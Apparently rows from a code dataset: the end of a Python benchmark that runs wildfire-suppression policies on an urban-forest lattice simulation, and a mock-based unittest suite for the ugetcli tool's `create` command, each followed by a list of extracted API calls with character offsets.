                                                                                 num_simulations))
    print('started at {0:s}'.format(time.strftime('%d-%b-%Y %H:%M')))
    # FIX: time.clock() was deprecated in 3.3 and removed in Python 3.8;
    # perf_counter() is the documented replacement for interval timing.
    tic = time.perf_counter()

    results = dict()
    staticmodel = StaticModel()
    for seed in range(num_simulations):
        np.random.seed(seed)  # reproducible per-run randomness
        simulation.reset()
        simulation.rng = seed

        while not simulation.early_end:
            branchmodel.reset()
            branchmodel.set_boundary(fire_boundary(simulation))
            if isinstance(policy, USTfires):
                staticmodel.set_boundary(urban_boundary(simulation))
                policy.urbanboundary = urban_boundary(simulation)

            def children_function(p):
                return forest_children(simulation, p)
            branchmodel.set_children_function(children_function)

            for _ in range(num_generations):
                # cache lattice children for every current parent before
                # the policy queries the model
                for process in branchmodel.GWprocesses.values():
                    for parent in process.current_parents:
                        if parent not in branchmodel.lattice_children:
                            branchmodel.lattice_children[parent] = branchmodel.children_function(parent)

                if not isinstance(policy, USTfires):
                    policy.generate_map(branchmodel)
                else:
                    policy.generate_map(branchmodel, staticmodel)

                branchmodel.next_generation(policy)
                if isinstance(policy, USTfires):
                    staticmodel.next_boundary(policy.control_decisions)

            # apply control and update simulator
            if not isinstance(policy, USTfires):
                control = policy.control(branchmodel)
            else:
                control = policy.control(branchmodel, staticmodel)
            simulation.update(control)

        if (seed+1) % 10 == 0:
            print('completed {0:d} simulations'.format((seed+1)))

        results[seed] = {'healthy_trees': simulation.stats_trees[0]/np.sum(simulation.stats_trees),
                         'healthy_urban': simulation.stats_urban[0]/np.sum(simulation.stats_urban),
                         'razed_urban': simulation.stats_urban[3]/np.sum(simulation.stats_urban)}

    toc = time.perf_counter()
    dt = toc - tic
    print('finished at {0:s}'.format(time.strftime('%d-%b-%Y %H:%M')))
    print('{0:0.2f}s = {1:0.2f}m = {2:0.2f}h elapsed'.format(dt, dt/60, dt/3600))

    # FIX: create the results directory on first use and close the file
    # deterministically even if pickling raises.
    filename = policy.name + '_s' + str(num_simulations) + '.pkl'
    os.makedirs('results', exist_ok=True)
    with open('results/' + filename, 'wb') as output:
        pickle.dump(results, output)

    print('median healthy trees: {0:0.2f}%'.format(100*np.median([results[s]['healthy_trees']
                                                               for s in results.keys()])))
    print('median healthy urban developments: {0:0.2f}%'.format(100*np.median([results[s]['healthy_urban']
                                                                               for s in results.keys()])))
    print('median removed urban developments: {0:0.2f}%'.format(100*np.median([results[s]['razed_urban']
                                                                               for s in results.keys()])))
    return
if __name__ == '__main__':
    # lattice geometry: square forest with an urban strip on the right edge
    lattice_size = 50
    urban_strip = 10

    # spatially varying parameters for the urban-forest lattice
    # (a uniform() variant exists for the plain LatticeForest case)
    alpha, beta, initial_fire, map_gmdp, p_parameters = nonuniform(
        UrbanForest(lattice_size, urban_strip))
    sim = UrbanForest(lattice_size, urban_strip,
                      initial_fire=initial_fire, alpha=alpha, beta=beta)

    # policy under test; swap in UBTfires/DWTfires/RHTfires/USTfires to compare
    pi = NCTfires(capacity=6, alpha_set=alpha, beta_set=beta,
                  control_map_gmdp=map_gmdp)

    # branching-process approximation of fire spread, plus the static urban model
    bm = BranchModel(lattice_parameters=p_parameters, pgf=binomial_pgf)
    sm = StaticModel()

    benchmark(sim, bm, pi, num_generations=1, num_simulations=1000)
    print()
| [
"Utilities.equivalent_percolation_control",
"time.clock",
"Utilities.urban_boundary",
"simulators.fires.UrbanForest.UrbanForest",
"Utilities.percolation_parameter",
"itertools.product",
"numpy.exp",
"numpy.random.seed",
"Utilities.fire_boundary",
"numpy.amin",
"Policies.NCTfires",
"numpy.floor... | [((423, 445), 'numpy.seterr', 'np.seterr', ([], {'all': '"""raise"""'}), "(all='raise')\n", (432, 445), True, 'import numpy as np\n'), ((575, 590), 'numpy.exp', 'np.exp', (['(-1 / 10)'], {}), '(-1 / 10)\n', (581, 590), True, 'import numpy as np\n'), ((597, 624), 'Utilities.percolation_parameter', 'percolation_parameter', (['a', 'b'], {}), '(a, b)\n', (618, 624), False, 'from Utilities import fire_boundary, urban_boundary, forest_children, percolation_parameter, equivalent_percolation_control\n'), ((745, 768), 'collections.defaultdict', 'defaultdict', (['(lambda : p)'], {}), '(lambda : p)\n', (756, 768), False, 'from collections import defaultdict\n'), ((884, 938), 'Utilities.equivalent_percolation_control', 'equivalent_percolation_control', (['a', 'b', 'delta_a', 'delta_b'], {}), '(a, b, delta_a, delta_b)\n', (914, 938), False, 'from Utilities import fire_boundary, urban_boundary, forest_children, percolation_parameter, equivalent_percolation_control\n'), ((1087, 1111), 'collections.defaultdict', 'defaultdict', (['(lambda : dp)'], {}), '(lambda : dp)\n', (1098, 1111), False, 'from collections import defaultdict\n'), ((1128, 1168), 'collections.defaultdict', 'defaultdict', (['(lambda : (delta_a, delta_b))'], {}), '(lambda : (delta_a, delta_b))\n', (1139, 1168), False, 'from collections import defaultdict\n'), ((1411, 1434), 'collections.defaultdict', 'defaultdict', (['(lambda : a)'], {}), '(lambda : a)\n', (1422, 1434), False, 'from collections import defaultdict\n'), ((1442, 1465), 'collections.defaultdict', 'defaultdict', (['(lambda : b)'], {}), '(lambda : b)\n', (1453, 1465), False, 'from collections import defaultdict\n'), ((1946, 1960), 'numpy.exp', 'np.exp', (['(-1 / 5)'], {}), '(-1 / 5)\n', (1952, 1960), True, 'import numpy as np\n'), ((1971, 1986), 'numpy.exp', 'np.exp', (['(-1 / 10)'], {}), '(-1 / 10)\n', (1977, 1986), True, 'import numpy as np\n'), ((2675, 2710), 'itertools.product', 'itertools.product', (['delta_r', 'delta_c'], {}), 
'(delta_r, delta_c)\n', (2692, 2710), False, 'import itertools\n'), ((4517, 4529), 'time.clock', 'time.clock', ([], {}), '()\n', (4527, 4529), False, 'import time\n'), ((4570, 4583), 'Analysis.StaticModel', 'StaticModel', ([], {}), '()\n', (4581, 4583), False, 'from Analysis import binomial_pgf, BranchModel, StaticModel\n'), ((6588, 6600), 'time.clock', 'time.clock', ([], {}), '()\n', (6598, 6600), False, 'import time\n'), ((6891, 6919), 'pickle.dump', 'pickle.dump', (['results', 'output'], {}), '(results, output)\n', (6902, 6919), False, 'import pickle\n'), ((8420, 8510), 'simulators.fires.UrbanForest.UrbanForest', 'UrbanForest', (['dimension', 'urban_width'], {'initial_fire': 'initial_fire', 'alpha': 'alpha', 'beta': 'beta'}), '(dimension, urban_width, initial_fire=initial_fire, alpha=alpha,\n beta=beta)\n', (8431, 8510), False, 'from simulators.fires.UrbanForest import UrbanForest\n'), ((8549, 8635), 'Policies.NCTfires', 'NCTfires', ([], {'capacity': 'cap', 'alpha_set': 'alpha', 'beta_set': 'beta', 'control_map_gmdp': 'map_gmdp'}), '(capacity=cap, alpha_set=alpha, beta_set=beta, control_map_gmdp=\n map_gmdp)\n', (8557, 8635), False, 'from Policies import NCTfires, UBTfires, DWTfires, RHTfires, USTfires\n'), ((9086, 9148), 'Analysis.BranchModel', 'BranchModel', ([], {'lattice_parameters': 'p_parameters', 'pgf': 'binomial_pgf'}), '(lattice_parameters=p_parameters, pgf=binomial_pgf)\n', (9097, 9148), False, 'from Analysis import binomial_pgf, BranchModel, StaticModel\n'), ((9158, 9171), 'Analysis.StaticModel', 'StaticModel', ([], {}), '()\n', (9169, 9171), False, 'from Analysis import binomial_pgf, BranchModel, StaticModel\n'), ((4633, 4653), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (4647, 4653), True, 'import numpy as np\n'), ((8311, 8346), 'simulators.fires.UrbanForest.UrbanForest', 'UrbanForest', (['dimension', 'urban_width'], {}), '(dimension, urban_width)\n', (8322, 8346), False, 'from simulators.fires.UrbanForest import 
UrbanForest\n'), ((2462, 2500), 'numpy.floor', 'np.floor', (['((simulation.dims[0] - 1) / 2)'], {}), '((simulation.dims[0] - 1) / 2)\n', (2470, 2500), True, 'import numpy as np\n'), ((2529, 2567), 'numpy.floor', 'np.floor', (['((simulation.dims[1] - 1) / 2)'], {}), '((simulation.dims[1] - 1) / 2)\n', (2537, 2567), True, 'import numpy as np\n'), ((3161, 3222), 'Utilities.percolation_parameter', 'percolation_parameter', (['alpha_set[neighbor]', 'beta_set[tree_rc]'], {}), '(alpha_set[neighbor], beta_set[tree_rc])\n', (3182, 3222), False, 'from Utilities import fire_boundary, urban_boundary, forest_children, percolation_parameter, equivalent_percolation_control\n'), ((4473, 4504), 'time.strftime', 'time.strftime', (['"""%d-%b-%Y %H:%M"""'], {}), "('%d-%b-%Y %H:%M')\n", (4486, 4504), False, 'import time\n'), ((6657, 6688), 'time.strftime', 'time.strftime', (['"""%d-%b-%Y %H:%M"""'], {}), "('%d-%b-%Y %H:%M')\n", (6670, 6688), False, 'import time\n'), ((4821, 4846), 'Utilities.fire_boundary', 'fire_boundary', (['simulation'], {}), '(simulation)\n', (4834, 4846), False, 'from Utilities import fire_boundary, urban_boundary, forest_children, percolation_parameter, equivalent_percolation_control\n'), ((5002, 5028), 'Utilities.urban_boundary', 'urban_boundary', (['simulation'], {}), '(simulation)\n', (5016, 5028), False, 'from Utilities import fire_boundary, urban_boundary, forest_children, percolation_parameter, equivalent_percolation_control\n'), ((5091, 5121), 'Utilities.forest_children', 'forest_children', (['simulation', 'p'], {}), '(simulation, p)\n', (5106, 5121), False, 'from Utilities import fire_boundary, urban_boundary, forest_children, percolation_parameter, equivalent_percolation_control\n'), ((6347, 6377), 'numpy.sum', 'np.sum', (['simulation.stats_trees'], {}), '(simulation.stats_trees)\n', (6353, 6377), True, 'import numpy as np\n'), ((6447, 6477), 'numpy.sum', 'np.sum', (['simulation.stats_urban'], {}), '(simulation.stats_urban)\n', (6453, 6477), True, 'import 
numpy as np\n'), ((6545, 6575), 'numpy.sum', 'np.sum', (['simulation.stats_urban'], {}), '(simulation.stats_urban)\n', (6551, 6575), True, 'import numpy as np\n'), ((2354, 2391), 'numpy.amin', 'np.amin', (['[delta_beta, beta_set[r, c]]'], {}), '([delta_beta, beta_set[r, c]])\n', (2361, 2391), True, 'import numpy as np\n'), ((4935, 4961), 'Utilities.urban_boundary', 'urban_boundary', (['simulation'], {}), '(simulation)\n', (4949, 4961), False, 'from Utilities import fire_boundary, urban_boundary, forest_children, percolation_parameter, equivalent_percolation_control\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Functional tests for `ugetcli` package - `create` command.
Tests functionality of the cli create command with various options.
"""
import os
import unittest
import json
from click.testing import CliRunner
from mock import MagicMock, patch
from ugetcli import cli
from ugetcli.utils import create_empty_file
class TestUGetCliCreate(unittest.TestCase):
    """Functional Tests for `ugetcli` package - `create` command.

    The ten tests below previously duplicated ~30 lines of mock wiring each;
    the shared setup now lives in three private helpers so each test states
    only what differs: the expected export paths, the fixture layout, and
    the CLI arguments.
    """

    # ------------------------------------------------------------------
    # shared fixtures
    # ------------------------------------------------------------------

    @staticmethod
    def _make_export_mock(invocation_results, project_fragment, asset_path,
                          package_path):
        """Build a fake UnityPackageRunner.export_unitypackage.

        args[0] is the (temporary) Unity project path and args[1] the output
        .unitypackage path. The fake validates both, creates the output file
        so the CLI can proceed as if Unity produced it, and flips
        ``invocation_results[0]`` to record that it ran.
        """
        def export_unitypackage_mock(*args, **kwargs):
            assert project_fragment in args[0]  # exported from temp folder
            assert os.path.normpath(asset_path) in args[0]
            assert os.path.normpath(package_path) in args[1]
            create_empty_file(args[1])
            invocation_results[0] = True
            return 0
        return export_unitypackage_mock

    def _setup_mocks(self, unitypackage_runner_mock, csproj_mock,
                     project_fragment='UnityProject',
                     asset_path='UnityProject/Assets/TestProject',
                     package_path='Output/TestProject_1.0.0_Release.unitypackage',
                     csproj_path='TestProject.csproj'):
        """Wire the UnityPackageRunner and CsProj mocks for one test.

        Returns a one-element list whose element 0 becomes True once the
        fake ``export_unitypackage`` has been invoked.
        """
        invocation_results = [False]

        runner_instance = MagicMock()
        runner_instance.export_unitypackage = self._make_export_mock(
            invocation_results, project_fragment, asset_path, package_path)
        unitypackage_runner_mock.return_value = runner_instance

        csproj_instance = MagicMock()
        csproj_instance.get_assembly_name.return_value = "TestProject"
        csproj_instance.get_assembly_version.return_value = "1.0.0"
        csproj_instance.get_output_path.return_value = "bin/Output/Debug"
        csproj_instance.path = csproj_path
        csproj_mock.return_value = csproj_instance
        return invocation_results

    @staticmethod
    def _create_build_output(build_dir="bin/Output/Debug"):
        """Create a fake msbuild output folder containing the assembly."""
        os.makedirs(build_dir)
        create_empty_file(build_dir + "/TestProject.dll")
        create_empty_file(build_dir + "/TestProject.pdb")

    # ------------------------------------------------------------------
    # tests
    # ------------------------------------------------------------------

    @patch('ugetcli.uget.CsProj')
    @patch('ugetcli.uget.UnityPackageRunner')
    def test_cli_uget_create(
        self, unitypackage_runner_mock, csproj_mock):
        """Test cli: uget create with default options"""
        invoked = self._setup_mocks(unitypackage_runner_mock, csproj_mock)
        csproj_mock.get_csproj_at_path.return_value = "TestProject.csproj"

        runner = CliRunner(env={})
        with runner.isolated_filesystem():
            self._create_build_output()
            result = runner.invoke(cli.ugetcli, ['create'], obj={})

        assert result.exit_code == 0, result
        unitypackage_runner_mock.assert_called_with(False)
        assert invoked[0], "did not invoke export_unitypackage_mock"

    @patch('ugetcli.uget.CsProj')
    @patch('ugetcli.uget.UnityPackageRunner')
    def test_cli_uget_create_with_path_directory(
        self, unitypackage_runner_mock, csproj_mock):
        """Test cli: uget create with --path option when path is a directory"""
        invoked = self._setup_mocks(unitypackage_runner_mock, csproj_mock,
                                    csproj_path="custom/MyProject.csproj")

        runner = CliRunner(env={})
        with runner.isolated_filesystem():
            self._create_build_output("custom/bin/Output/Debug")
            result = runner.invoke(cli.ugetcli, ['create', '--path', 'custom/'], obj={})

        assert result.exit_code == 0, result
        unitypackage_runner_mock.assert_called_with(False)
        csproj_mock.assert_called_with('custom/')
        assert invoked[0], "did not invoke export_unitypackage_mock"

    @patch('ugetcli.uget.CsProj')
    @patch('ugetcli.uget.UnityPackageRunner')
    def test_cli_uget_create_with_path_file(
        self, unitypackage_runner_mock, csproj_mock):
        """Test cli: uget create with --path option when path is a .csproj file"""
        invoked = self._setup_mocks(unitypackage_runner_mock, csproj_mock,
                                    csproj_path="custom/MyProject.csproj")

        runner = CliRunner(env={})
        with runner.isolated_filesystem():
            self._create_build_output("custom/bin/Output/Debug")
            result = runner.invoke(cli.ugetcli, ['create', '--path', 'custom/MyProject.csproj'], obj={})

        assert result.exit_code == 0, result
        unitypackage_runner_mock.assert_called_with(False)
        csproj_mock.assert_called_with('custom/MyProject.csproj')
        assert invoked[0], "did not invoke export_unitypackage_mock"

    @patch('ugetcli.uget.CsProj')
    @patch('ugetcli.uget.UnityPackageRunner')
    def test_cli_uget_create_with_output_dir(
        self, unitypackage_runner_mock, csproj_mock):
        """Test cli: uget create with --output-dir option"""
        invoked = self._setup_mocks(
            unitypackage_runner_mock, csproj_mock,
            package_path='out/TestProject_1.0.0_Release.unitypackage')

        runner = CliRunner(env={})
        with runner.isolated_filesystem():
            self._create_build_output()
            result = runner.invoke(cli.ugetcli, ['create', '--output-dir', 'out'], obj={})

        assert result.exit_code == 0, result
        unitypackage_runner_mock.assert_called_with(False)
        assert invoked[0], "did not invoke export_unitypackage_mock"

    @patch('ugetcli.uget.CsProj')
    @patch('ugetcli.uget.UnityPackageRunner')
    def test_cli_uget_create_with_configuration(
        self, unitypackage_runner_mock, csproj_mock):
        """Test cli: uget create with --configuration option"""
        invoked = self._setup_mocks(
            unitypackage_runner_mock, csproj_mock,
            package_path='Output/TestProject_1.0.0_Debug.unitypackage')

        runner = CliRunner(env={})
        with runner.isolated_filesystem():
            self._create_build_output()
            result = runner.invoke(cli.ugetcli, ['create', '--configuration', 'Debug'],
                                   obj={})

        assert result.exit_code == 0, result
        unitypackage_runner_mock.assert_called_with(False)
        assert invoked[0], "did not invoke export_unitypackage_mock"

    @patch('ugetcli.uget.CsProj')
    @patch('ugetcli.uget.UnityPackageRunner')
    def test_cli_uget_create_with_unity_project_path(
        self, unitypackage_runner_mock, csproj_mock):
        """Test cli: uget create with --unity-project-path"""
        invoked = self._setup_mocks(unitypackage_runner_mock, csproj_mock,
                                    project_fragment='MyUnityProject')

        runner = CliRunner(env={})
        with runner.isolated_filesystem():
            self._create_build_output()
            result = runner.invoke(
                cli.ugetcli, ['create', '--unity-project-path', 'MyUnityProject'], obj={})

        assert result.exit_code == 0, result
        unitypackage_runner_mock.assert_called_with(False)
        assert invoked[0], "did not invoke export_unitypackage_mock"

    @patch('ugetcli.uget.CsProj')
    @patch('ugetcli.uget.UnityPackageRunner')
    def test_cli_uget_create_with_root_directory(
        self, unitypackage_runner_mock, csproj_mock):
        """Test cli: uget create with --root-dir"""
        invoked = self._setup_mocks(
            unitypackage_runner_mock, csproj_mock,
            asset_path='UnityProject/Assets/MyUnityPackageRoot')

        runner = CliRunner(env={})
        with runner.isolated_filesystem():
            self._create_build_output()
            result = runner.invoke(
                cli.ugetcli, ['create', '--root-dir', 'MyUnityPackageRoot'], obj={})

        assert result.exit_code == 0, result
        unitypackage_runner_mock.assert_called_with(False)
        assert invoked[0], "did not invoke export_unitypackage_mock"

    @patch('ugetcli.uget.CsProj')
    @patch('ugetcli.uget.UnityPackageRunner')
    def test_cli_uget_create_with_clean(
        self, unitypackage_runner_mock, csproj_mock):
        """Test cli: uget create with --clean"""
        invoked = self._setup_mocks(unitypackage_runner_mock, csproj_mock)

        runner = CliRunner(env={})
        with runner.isolated_filesystem():
            self._create_build_output()
            os.makedirs("Output/")
            create_empty_file("Output/TestProject_0.1.0_Release.unitypackage")  # Should be removed
            create_empty_file("Output/TestProject_0.1.1_Release.unitypackage")  # Should be removed
            create_empty_file("Output/TestProject_0.1.0_Debug.unitypackage")    # Should NOT be removed

            result = runner.invoke(
                cli.ugetcli, ['create', '--clean'], obj={})

            # --clean must remove stale packages of the active configuration only
            assert not os.path.isfile("Output/TestProject_0.1.0_Release.unitypackage")
            assert not os.path.isfile("Output/TestProject_0.1.1_Release.unitypackage")
            assert os.path.isfile("Output/TestProject_0.1.0_Debug.unitypackage")

        assert result.exit_code == 0, result
        unitypackage_runner_mock.assert_called_with(False)
        assert invoked[0], "did not invoke export_unitypackage_mock"

    @patch('ugetcli.uget.CsProj')
    @patch('ugetcli.uget.UnityPackageRunner')
    def test_cli_uget_create_with_unity_username(
        self, unitypackage_runner_mock, csproj_mock):
        """Test cli: uget create with --unity-username"""
        # NOTE(review): despite its name this test invokes plain `create`
        # with no username option, duplicating the default-options test.
        # Kept as-is to preserve the suite's existing behavior; it should
        # probably pass '--unity-username' to the CLI -- confirm intent.
        invoked = self._setup_mocks(unitypackage_runner_mock, csproj_mock)

        runner = CliRunner(env={})
        with runner.isolated_filesystem():
            self._create_build_output()
            result = runner.invoke(
                cli.ugetcli, ['create'], obj={})

        assert result.exit_code == 0, result
        unitypackage_runner_mock.assert_called_with(False)
        assert invoked[0], "did not invoke export_unitypackage_mock"

    @patch('ugetcli.uget.CsProj')
    @patch('ugetcli.uget.UnityPackageRunner')
    def test_cli_uget_create_with_config_json(
        self, unitypackage_runner_mock, csproj_mock):
        """Test cli: uget create with options loaded via config json"""
        invoked = self._setup_mocks(
            unitypackage_runner_mock, csproj_mock,
            project_fragment='CustomUnityProject',
            asset_path='CustomUnityProject/Assets/MyUnityPackage',
            package_path='CustomOutput/TestProject_1.0.0_Debug.unitypackage')

        config_data = {
            "output_dir": "CustomOutput",
            "configuration": "Debug",
            "unity_project_path": "CustomUnityProject",
            "root_dir": "MyUnityPackage",
            "clean": True,
        }

        runner = CliRunner(env={})
        with runner.isolated_filesystem():
            self._create_build_output()
            os.makedirs("CustomOutput/")
            create_empty_file("CustomOutput/TestProject_0.1.0_Release.unitypackage")  # Should be removed

            result = runner.invoke(
                cli.ugetcli, ['create', '--config', json.dumps(config_data)], obj={})

            # NOTE(review): the stale package above is created in CustomOutput/,
            # so this assertion on Output/ is vacuously true -- presumably it
            # was meant to check the CustomOutput path; verify the intended
            # --clean semantics before changing it.
            assert not os.path.isfile("Output/TestProject_0.1.0_Release.unitypackage")

        assert result.exit_code == 0, result
        unitypackage_runner_mock.assert_called_with(False)
        assert invoked[0], "did not invoke export_unitypackage_mock"
| [
"mock.patch",
"os.makedirs",
"json.dumps",
"click.testing.CliRunner",
"os.path.isfile",
"os.path.normpath",
"ugetcli.utils.create_empty_file",
"mock.MagicMock"
] | [((481, 509), 'mock.patch', 'patch', (['"""ugetcli.uget.CsProj"""'], {}), "('ugetcli.uget.CsProj')\n", (486, 509), False, 'from mock import MagicMock, patch\n'), ((515, 555), 'mock.patch', 'patch', (['"""ugetcli.uget.UnityPackageRunner"""'], {}), "('ugetcli.uget.UnityPackageRunner')\n", (520, 555), False, 'from mock import MagicMock, patch\n'), ((2343, 2371), 'mock.patch', 'patch', (['"""ugetcli.uget.CsProj"""'], {}), "('ugetcli.uget.CsProj')\n", (2348, 2371), False, 'from mock import MagicMock, patch\n'), ((2377, 2417), 'mock.patch', 'patch', (['"""ugetcli.uget.UnityPackageRunner"""'], {}), "('ugetcli.uget.UnityPackageRunner')\n", (2382, 2417), False, 'from mock import MagicMock, patch\n'), ((4270, 4298), 'mock.patch', 'patch', (['"""ugetcli.uget.CsProj"""'], {}), "('ugetcli.uget.CsProj')\n", (4275, 4298), False, 'from mock import MagicMock, patch\n'), ((4304, 4344), 'mock.patch', 'patch', (['"""ugetcli.uget.UnityPackageRunner"""'], {}), "('ugetcli.uget.UnityPackageRunner')\n", (4309, 4344), False, 'from mock import MagicMock, patch\n'), ((6227, 6255), 'mock.patch', 'patch', (['"""ugetcli.uget.CsProj"""'], {}), "('ugetcli.uget.CsProj')\n", (6232, 6255), False, 'from mock import MagicMock, patch\n'), ((6261, 6301), 'mock.patch', 'patch', (['"""ugetcli.uget.UnityPackageRunner"""'], {}), "('ugetcli.uget.UnityPackageRunner')\n", (6266, 6301), False, 'from mock import MagicMock, patch\n'), ((8054, 8082), 'mock.patch', 'patch', (['"""ugetcli.uget.CsProj"""'], {}), "('ugetcli.uget.CsProj')\n", (8059, 8082), False, 'from mock import MagicMock, patch\n'), ((8088, 8128), 'mock.patch', 'patch', (['"""ugetcli.uget.UnityPackageRunner"""'], {}), "('ugetcli.uget.UnityPackageRunner')\n", (8093, 8128), False, 'from mock import MagicMock, patch\n'), ((9928, 9956), 'mock.patch', 'patch', (['"""ugetcli.uget.CsProj"""'], {}), "('ugetcli.uget.CsProj')\n", (9933, 9956), False, 'from mock import MagicMock, patch\n'), ((9962, 10002), 'mock.patch', 'patch', 
(['"""ugetcli.uget.UnityPackageRunner"""'], {}), "('ugetcli.uget.UnityPackageRunner')\n", (9967, 10002), False, 'from mock import MagicMock, patch\n'), ((11805, 11833), 'mock.patch', 'patch', (['"""ugetcli.uget.CsProj"""'], {}), "('ugetcli.uget.CsProj')\n", (11810, 11833), False, 'from mock import MagicMock, patch\n'), ((11839, 11879), 'mock.patch', 'patch', (['"""ugetcli.uget.UnityPackageRunner"""'], {}), "('ugetcli.uget.UnityPackageRunner')\n", (11844, 11879), False, 'from mock import MagicMock, patch\n'), ((13667, 13695), 'mock.patch', 'patch', (['"""ugetcli.uget.CsProj"""'], {}), "('ugetcli.uget.CsProj')\n", (13672, 13695), False, 'from mock import MagicMock, patch\n'), ((13701, 13741), 'mock.patch', 'patch', (['"""ugetcli.uget.UnityPackageRunner"""'], {}), "('ugetcli.uget.UnityPackageRunner')\n", (13706, 13741), False, 'from mock import MagicMock, patch\n'), ((16078, 16106), 'mock.patch', 'patch', (['"""ugetcli.uget.CsProj"""'], {}), "('ugetcli.uget.CsProj')\n", (16083, 16106), False, 'from mock import MagicMock, patch\n'), ((16112, 16152), 'mock.patch', 'patch', (['"""ugetcli.uget.UnityPackageRunner"""'], {}), "('ugetcli.uget.UnityPackageRunner')\n", (16117, 16152), False, 'from mock import MagicMock, patch\n'), ((17903, 17931), 'mock.patch', 'patch', (['"""ugetcli.uget.CsProj"""'], {}), "('ugetcli.uget.CsProj')\n", (17908, 17931), False, 'from mock import MagicMock, patch\n'), ((17937, 17977), 'mock.patch', 'patch', (['"""ugetcli.uget.UnityPackageRunner"""'], {}), "('ugetcli.uget.UnityPackageRunner')\n", (17942, 17977), False, 'from mock import MagicMock, patch\n'), ((1226, 1237), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (1235, 1237), False, 'from mock import MagicMock, patch\n'), ((1426, 1437), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (1435, 1437), False, 'from mock import MagicMock, patch\n'), ((1847, 1864), 'click.testing.CliRunner', 'CliRunner', ([], {'env': '{}'}), '(env={})\n', (1856, 1864), False, 'from click.testing import 
CliRunner\n'), ((3131, 3142), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (3140, 3142), False, 'from mock import MagicMock, patch\n'), ((3331, 3342), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (3340, 3342), False, 'from mock import MagicMock, patch\n'), ((3682, 3699), 'click.testing.CliRunner', 'CliRunner', ([], {'env': '{}'}), '(env={})\n', (3691, 3699), False, 'from click.testing import CliRunner\n'), ((5056, 5067), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (5065, 5067), False, 'from mock import MagicMock, patch\n'), ((5256, 5267), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (5265, 5267), False, 'from mock import MagicMock, patch\n'), ((5607, 5624), 'click.testing.CliRunner', 'CliRunner', ([], {'env': '{}'}), '(env={})\n', (5616, 5624), False, 'from click.testing import CliRunner\n'), ((6989, 7000), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (6998, 7000), False, 'from mock import MagicMock, patch\n'), ((7189, 7200), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (7198, 7200), False, 'from mock import MagicMock, patch\n'), ((7535, 7552), 'click.testing.CliRunner', 'CliRunner', ([], {'env': '{}'}), '(env={})\n', (7544, 7552), False, 'from click.testing import CliRunner\n'), ((8823, 8834), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (8832, 8834), False, 'from mock import MagicMock, patch\n'), ((9023, 9034), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (9032, 9034), False, 'from mock import MagicMock, patch\n'), ((9369, 9386), 'click.testing.CliRunner', 'CliRunner', ([], {'env': '{}'}), '(env={})\n', (9378, 9386), False, 'from click.testing import CliRunner\n'), ((10704, 10715), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (10713, 10715), False, 'from mock import MagicMock, patch\n'), ((10904, 10915), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (10913, 10915), False, 'from mock import MagicMock, patch\n'), ((11250, 11267), 'click.testing.CliRunner', 'CliRunner', ([], {'env': '{}'}), '(env={})\n', (11259, 11267), False, 
'from click.testing import CliRunner\n'), ((12572, 12583), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (12581, 12583), False, 'from mock import MagicMock, patch\n'), ((12772, 12783), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (12781, 12783), False, 'from mock import MagicMock, patch\n'), ((13118, 13135), 'click.testing.CliRunner', 'CliRunner', ([], {'env': '{}'}), '(env={})\n', (13127, 13135), False, 'from click.testing import CliRunner\n'), ((14415, 14426), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (14424, 14426), False, 'from mock import MagicMock, patch\n'), ((14615, 14626), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (14624, 14626), False, 'from mock import MagicMock, patch\n'), ((14961, 14978), 'click.testing.CliRunner', 'CliRunner', ([], {'env': '{}'}), '(env={})\n', (14970, 14978), False, 'from click.testing import CliRunner\n'), ((16844, 16855), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (16853, 16855), False, 'from mock import MagicMock, patch\n'), ((17044, 17055), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (17053, 17055), False, 'from mock import MagicMock, patch\n'), ((17390, 17407), 'click.testing.CliRunner', 'CliRunner', ([], {'env': '{}'}), '(env={})\n', (17399, 17407), False, 'from click.testing import CliRunner\n'), ((18699, 18710), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (18708, 18710), False, 'from mock import MagicMock, patch\n'), ((18899, 18910), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (18908, 18910), False, 'from mock import MagicMock, patch\n'), ((19485, 19502), 'click.testing.CliRunner', 'CliRunner', ([], {'env': '{}'}), '(env={})\n', (19494, 19502), False, 'from click.testing import CliRunner\n'), ((1097, 1123), 'ugetcli.utils.create_empty_file', 'create_empty_file', (['args[1]'], {}), '(args[1])\n', (1114, 1123), False, 'from ugetcli.utils import create_empty_file\n'), ((1920, 1951), 'os.makedirs', 'os.makedirs', (['"""bin/Output/Debug"""'], {}), "('bin/Output/Debug')\n", (1931, 1951), 
